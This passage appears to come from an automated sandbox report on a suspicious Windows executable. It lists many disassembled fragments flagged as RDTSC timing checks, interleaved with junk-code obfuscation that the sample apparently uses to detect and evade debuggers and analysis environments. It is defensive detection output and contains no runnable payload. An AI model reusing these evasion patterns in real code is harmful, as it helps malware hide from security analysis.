pop esi 0x00000066 push 67BBB1CBh 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 pop ecx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575BE8 second address: 575BF2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575D1B second address: 575D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 je 00007FB438C61F38h 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FB438C61F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575D30 second address: 575D47 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jc 00007FB4390A66BEh 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 575D47 second address: 575D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FB438C61F2Fh 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB438C61F2Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 595AF3 second address: 595AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 595C41 second address: 595C5B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB438C61F32h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 595DAD second address: 595DC1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jno 00007FB4390A66B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FB4390A66B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 595DC1 second address: 595DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59609B second address: 5960C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FB4390A66BDh 0x00000010 js 00007FB4390A66B6h 0x00000016 je 00007FB4390A66B6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5960C0 second address: 5960C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5960C6 second address: 5960CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 596217 second address: 59621D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59621D second address: 596223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5964E9 second address: 5964F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5964F3 second address: 596503 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB4390A66B6h 0x00000008 jnl 00007FB4390A66B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 596648 second address: 59664E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 596922 second address: 59692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58DF21 second address: 58DF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58DF29 second address: 58DF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 569007 second address: 569015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB438C61F26h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5973DE second address: 59741A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007FB4390A66B6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FB4390A66BBh 0x00000013 jmp 00007FB4390A66C2h 0x00000018 jmp 00007FB4390A66C0h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F0D7 second address: 55F0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55F0EC second address: 55F0FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59AF38 second address: 59AF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B49B second address: 59B4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB4390A66BAh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59A4FC second address: 59A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59A502 second address: 59A50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59A50D second address: 59A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B6E0 second address: 59B6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2772 second address: 5A2776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A28CD second address: 5A28D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A28D1 second address: 5A28E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F30h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2E84 second address: 5A2E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2E8C second address: 5A2E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2FEB second address: 5A2FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2FF1 second address: 5A2FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2FF5 second address: 5A3019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C2h 0x00000007 jnp 00007FB4390A66B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007FB4390A66BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E3E second address: 5A5E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E42 second address: 5A5E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E46 second address: 5A5E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E4C second address: 5A5E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E57 second address: 5A5E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E64 second address: 5A5E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E68 second address: 5A5E72 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB438C61F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E72 second address: 5A5E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB4390A66B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E82 second address: 5A5E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A5E86 second address: 5A5EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB4390A66C5h 0x0000000d jmp 00007FB4390A66C2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A65C1 second address: 5A6613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F31h 0x00000009 popad 0x0000000a add dword ptr [esp], 18CC9A2Fh 0x00000011 jmp 00007FB438C61F35h 0x00000016 push 0666C8F7h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB438C61F39h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6765 second address: 5A6786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FB4390A66B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6942 second address: 5A6948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6BA6 second address: 5A6BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6C65 second address: 5A6C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6CFC second address: 5A6D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6D04 second address: 5A6D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FB438C61F26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6D15 second address: 5A6D25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A6D25 second address: 5A6D2F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB438C61F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A716C second address: 5A7172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A7172 second address: 5A7176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A7176 second address: 5A717A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A75E3 second address: 5A75F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A7694 second address: 5A7699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A969D second address: 5A96A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A96A1 second address: 5A96A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A96A5 second address: 5A96C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB438C61F39h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A96C8 second address: 5A96CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A96CC second address: 5A9724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB438C61F2Ah 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FB438C61F28h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007FB438C61F38h 0x0000002c push 00000000h 0x0000002e clc 0x0000002f push 00000000h 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 push esi 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A9724 second address: 5A974A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB4390A66B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A974A second address: 5A9750 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AA18F second address: 5AA1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007FB4390A66B6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB4390A66BCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AA1AE second address: 5AA206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edx, dword ptr [ebp+122D327Bh] 0x00000011 add di, 56E7h 0x00000016 popad 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FB438C61F28h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D36A9h], edi 0x00000039 push 00000000h 0x0000003b cld 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push edi 0x00000041 pop edi 0x00000042 push esi 0x00000043 pop esi 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AA206 second address: 5AA238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FB4390A66C0h 0x00000011 jmp 00007FB4390A66C5h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AA238 second address: 5AA23E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5ACC7E second address: 5ACCDA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4390A66BCh 0x00000008 jnp 00007FB4390A66B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB4390A66B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jng 00007FB4390A66B9h 0x00000033 movzx edi, bx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007FB4390A66B8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 push esi 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF525 second address: 5AF52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B0552 second address: 5B05EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D2BA5h], edx 0x00000017 push 00000000h 0x00000019 mov ebx, 6DCF8BAFh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FB4390A66B8h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a call 00007FB4390A66C9h 0x0000003f push esi 0x00000040 sbb edi, 1919A311h 0x00000046 pop ebx 0x00000047 pop edi 0x00000048 add bx, C634h 0x0000004d xchg eax, esi 0x0000004e jmp 00007FB4390A66BEh 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jl 00007FB4390A66B8h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B05EB second address: 5B05F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B26FD second address: 5B2701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B36B9 second address: 5B36CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B36CE second address: 5B36D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B46A5 second address: 5B46AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5650 second address: 5B5655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5655 second address: 5B566C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C61F28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB438C61F28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AE67A second address: 5AE684 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4390A66BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6802 second address: 5B6806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6806 second address: 5B680C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AE684 second address: 5AE6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2BE5h], ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, 2D493DA5h 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 jmp 00007FB438C61F2Ah 0x00000025 mov eax, dword ptr [ebp+122D08FDh] 0x0000002b jne 00007FB438C61F27h 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FB438C61F28h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+122D2830h] 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 jp 00007FB438C61F2Ch 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B680C second address: 5B6812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AE6F6 second address: 5AE728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB438C61F31h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB438C61F34h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AE728 second address: 5AE732 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF67F second address: 5AF690 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C61F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF690 second address: 5AF695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
